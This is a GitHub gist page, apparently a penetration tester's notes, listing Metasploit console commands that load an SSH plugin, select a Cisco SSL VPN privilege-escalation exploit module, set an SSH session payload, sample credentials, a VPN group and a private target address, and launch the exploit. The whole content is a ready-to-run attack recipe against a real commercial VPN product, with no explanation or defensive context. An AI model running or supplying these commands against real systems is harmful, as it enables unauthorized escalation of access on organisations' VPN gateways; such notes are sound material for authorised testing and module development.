Skip to content

Instantly share code, notes, and snippets.

@claudijd
Created April 28, 2014 17:11
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save claudijd/11378141 to your computer and use it in GitHub Desktop.
Save claudijd/11378141 to your computer and use it in GitHub Desktop.
Cisco SSL VPN Privilege Escalation MSF Notes
load ~/metasploit/plugins/meta_ssh
use exploit/multi/http/cisco_ssl_vpn_priv_esc
set PAYLOAD ssh/metassh_session
set USERNAME jsmith
set PASSWORD jsmith
set GROUP vendor
set RHOST 192.168.101.1
exploit
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment